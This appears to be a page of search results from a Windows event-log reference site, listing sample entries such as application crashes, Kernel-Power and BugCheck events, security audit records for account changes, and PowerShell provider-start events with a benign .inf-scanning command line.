Faulting module name: twinapi.appcore.dll, version: 10.0.20348.1129, time stamp: 0x5b888f7b
Exception code: 0xc0000409
Fault offset: 0x00000000000d222b
Faulting process id: 0x144c
Faulting application start time: 0x01d94a82bf78f269
Faulting application path: C:\Windows\system32\BackgroundTaskHost.exe
Faulting module path: C:\Windows\System32\twinapi.appcore.dll
Report Id: ad3e8927-b13c-4133-97a0-a96e03efd1cc
Faulting package full name: Microsoft.AAD.BrokerPlugin_1000.19580.1000.0_neutral_neutral_cw5n1h2txyewy
Faulting package-relative application ID: App


Event ID:
Source:
MSSQLSERVER
Category:
Backup
Message:
BACKUP failed to complete the command BACKUP LOG model. Check the backup application log for detailed messages.


Event ID:
Source:
stornvme
Message:
The driver detected a controller error on \Device\Raidport3.


Event ID:
Source:
Kernel-Power
Category:
268
Message:
The system session has transitioned from 16 to 18.

Reason: 220


Event ID:
Source:
Kernel-Power
Category:
268
Message:
The system session has transitioned from 16 to 18.

Reason: 220


Event ID:
Source:
ESENT
Category:
Enregistrement/récupération
Message:
svchost (9916,R,98) TILEREPOSITORYS-1-5-18: L’erreur -1023 (0xfffffc01) s’est produite lors de l’ouverture d’un fichier journal


Event ID:
Source:
DistributedCOM
Message:
The server {021E4F06-9DCC-49AD-88CF-ECC2DA314C8A} did not register with DCOM within the required timeout.


Event ID:
Source:
Security
Category:
Audit User Account Management
Message:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4738</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13824</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-08-20T16:22:02.792454100Z" />
<EventRecordID>175413</EventRecordID>
<Correlation />
<Execution ProcessID="520" ThreadID="1508" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="Dummy">-</Data>
<Data Name="TargetUserName">ksmith</Data>
<Data Name="TargetDomainName">CONTOSO</Data>
<Data Name="TargetSid">S-1-5-21-3457937927-2839227994-823803824-6609</Data>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x30dc2</Data>
<Data Name="PrivilegeList">-</Data>
<Data Name="SamAccountName">-</Data>
<Data Name="DisplayName">-</Data>
<Data Name="UserPrincipalName">-</Data>
<Data Name="HomeDirectory">-</Data>
<Data Name="HomePath">-</Data>
<Data Name="ScriptPath">-</Data>
<Data Name="ProfilePath">-</Data>
<Data Name="UserWorkstations">-</Data>
<Data Name="PasswordLastSet">-</Data>
<Data Name="AccountExpires">-</Data>
<Data Name="PrimaryGroupId">-</Data>
<Data Name="AllowedToDelegateTo">-</Data>
<Data Name="OldUacValue">0x15</Data>
<Data Name="NewUacValue">0x211</Data>
<Data Name="UserAccountControl">%%2050 %%2089</Data>
<Data Name="UserParameters">-</Data>
<Data Name="SidHistory">-</Data>
<Data Name="LogonHours">-</Data>
</EventData>
</Event>


Event ID:
Source:
PowerShell (PoweShell)
Category:
Task Category (6)
Message:
Details:
ProviderName=Function
NewProviderState=Started

SequenceNumber=9

HostName=ConsoleHost
HostVersion=5.1.19041.2673
HostId=1e6d96ab-43f1-4b85-bd39-3cc54faa962d
HostApplication=powershell.exe -ExecutionPolicy Restricted -Command $Res = 0; $Infs = Get-Item -Path ($env:WinDir + '\inf\*.inf'); foreach ($Inf in $Infs) { $Data = Get-Content $Inf.FullName; if ($Data -match '\[defaultinstall.nt(amd64|arm|arm64|x86)\]') { $Res = 1; break; } } Write-Host 'Final result:', $Res;
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=


Event ID:
Source:
PowerShell (PoweShell)
Category:
Task Category (6)
Message:
Provider "Function" is Started.

Details:
ProviderName=Function
NewProviderState=Started

SequenceNumber=9

HostName=ConsoleHost
HostVersion=5.1.19041.2673
HostId=1e6d96ab-43f1-4b85-bd39-3cc54faa962d
HostApplication=powershell.exe -ExecutionPolicy Restricted -Command $Res = 0; $Infs = Get-Item -Path ($env:WinDir + '\inf\*.inf'); foreach ($Inf in $Infs) { $Data = Get-Content $Inf.FullName; if ($Data -match '\[defaultinstall.nt(amd64|arm|arm64|x86)\]') { $Res = 1; break; } } Write-Host 'Final result:', $Res;
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=


Event ID:
Source:
DbxSvc
Message:
CertFindCertificateInStore failed with: (-2146885628) Cannot find object or property.


Event ID:
Source:
TerminalServices-RemoteConnectionManager
Category:
None
Message:
The RD Session Host server received large number of incomplete connections. The system may be under attack.


Event ID:
Source:
Application Error
Message:
Faulting application name: BackgroundTaskHost.exe, version: 10.0.19041.546, time stamp: 0x1d3a15e7
Faulting module name: ntdll.dll, version: 10.0.19041.3155, time stamp: 0x5212ece5
Exception code: 0xc0000374
Fault offset: 0x00000000000ff419
Faulting process id: 0xafb0
Faulting application start time: 0x01d9c3f947c55a40
Faulting application path: C:\WINDOWS\system32\BackgroundTaskHost.exe
Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll
Report Id: 29e16c65-2180-4e57-9cf3-14d887083a9e
Faulting package full name: Microsoft.AAD.BrokerPlugin_1000.19041.1023.0_neutral_neutral_cw5n1h2txyewy
Faulting package-relative application ID: App


Event ID:
Source:
Service Control Manager
Message:
The EuGdiDrv Service was not started due to the following error:
The specified path cannot be found.


Event ID:
Source:
Service Control Manager
Message:
The EuGdiDrv Service was not started due to the following error:
The specified path cannot be found.


Event ID:
Source:
schannel
Message:
The following fatal alert was received: 40.



Event ID:
Source:
nhi
Message:
Error code: 0xDC, Sub error code: 0x7C


Event ID:
Source:
nhi
Message:
Error code: 0xDC, Sub error code: 0x7C


Event ID:
Source:
Nvidia
Category:
None
Message:
DrvSetContext failed functionality indeterminant(pid=2112 cncmd.ext 64bit)


Event ID:
Source:
Service Control Manager
Category:
None
Message:
The following boot-start or system-start driver(s) did not load:
dam


Event ID:
Source:
BugCheck
Category:
None
Message:
The computer has rebooted from a bugcheck. The bugcheck was: 0x0000003b (0x0000000080000003, 0xfffff8063333dee3, 0xffff8308449f4dd0, 0x0000000000000000). A dump was saved in: C:\Windows\MEMORY.DMP. Report Id: c5f3df43-03aa-46e1-8751-ce9800ff3fa9.


Event ID:
Source:
DistributedCOM
Category:
Aucun
Message:
Classique


Event ID:
Source:
ModernDeployment-Diagnostics-Provider
Message:
Autopilot.dll WIL error was reported.
HRESULT: 0x80070491
File: onecoreuap\admin\moderndeployment\autopilot\dll\dllmain.cpp, line 128
Message: NULL


Event ID:
Source:
MIQADS
Message:
Logs staus


Event ID:
Source:
Kernel-EventTracing
Category:
Session
Message:
Session "NT Kernel Logger" failed to start with the following error: 0xC0000035


Event ID:
Source:
EvntAgnt
Message:
Error reading log event record. Handle specified is 927269016. Return code from ReadEventLog is 87.


Event ID:
Source:
CertificateServicesClient-CertEnroll
Message:
Certificate enrollment for Local system failed in authentication to policy servers with ID {########-####-####-####-72067EF2E6D9} (The user name or password is incorrect. 0x8007052e (WIN32: 1326 ERROR_LOGON_FAILURE))


Event ID:
Source:
Microsoft Windows security auditing
Message:
LogName=Security
EventCode=4725
EventType=0
ComputerName=domain.domain.local
SourceName=Microsoft Windows security auditing.
Type=Information
RecordNumber=2311231312
Keywords=Audit Success
TaskCategory=User Account Management
OpCode=Info
Message=A user account was disabled.

Subject:
Security ID: S-1-5-21-5232424-4342331231-1232132131-1605
Account Name: doamin
Account Domain: local
Logon ID: 0x1dasdwD

Target Account:
Security ID: S-1-5-21-5232424-4342331231-1232132131-1605
Account Name: ws-APP$
Account Domain: local


Event ID:
Source:
Application Error
Message:
Faulting application name: SweetAffection.exe, version: 0.0.0.0, time stamp: 0x6172bb09
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000000000000
Faulting process id: 0x698c
Faulting application start time: 0x01dac90f4dd836ea
Faulting application path: D:\ganestarts\SweetAffection-0.10.7-pc\SweetAffection.exe
Faulting module path: unknown
Report Id: 44bc9f5f-6f32-47ef-a0e3-4450382e76dd
Faulting package full name:



Event ID:
Source:
Search
Category:
Gatherer
Message:
Error ID 1 happened in Windows Search recovery stage, please restart the service. If this error persists, please recreate the index.

Context: Application, SystemIndex Catalog

Details:
0x%08x (0x80040d23 - The gatherer is shutting down. (HRESULT : 0x80040d23))



Event ID:
Source:
System
Message:
The TCP/IP NetBIOS Helper service was successfully sent a stop control.

The reason specified was: 0x40030011 [Operating System: Network Connectivity (Planned)]

Comment: None




Event ID:
Source:
Application Error
Category:
(100)
Message:
Faulting application name: wuauclt.exe, version: 10.0.17763.3532, time stamp: 0x169653c2
Faulting module name: combase.dll, version: 10.0.17763.5576, time stamp: 0xe64b4fc6
Exception code: 0xc0000005
Fault offset: 0x00000000000588b8
Faulting process id: 0x7c8
Faulting application start time: 0x01db3b3a65732008
Faulting application path: C:\Windows\system32\wuauclt.exe
Faulting module path: C:\Windows\System32\combase.dll
Report Id: 822e0180-614d-4eb0-94c6-0dd5ca2335ac
Faulting package full name:
Faulting package-relative application ID:


Event ID:
Source:
SideBySide
Category:
None
Message:
Generate Activation Context failed for F:\Internet Downloads\McAfee VirusScan CLI Scanner\cls-w32-702-l\scan.exe.Manifest. Reference error message: The operation completed successfully.
.


Event ID:
Source:
Microsoft-Windows-Directory-Services-SAM
Message:
There is no message from the SIEM logs I'm seeing from. Fields unique to this Event ID (Kibana Discover):

winlog.event_data.AccountDN
winlog.event_data.AccountSID
winlog.event_data.KeyHash


Found 812 records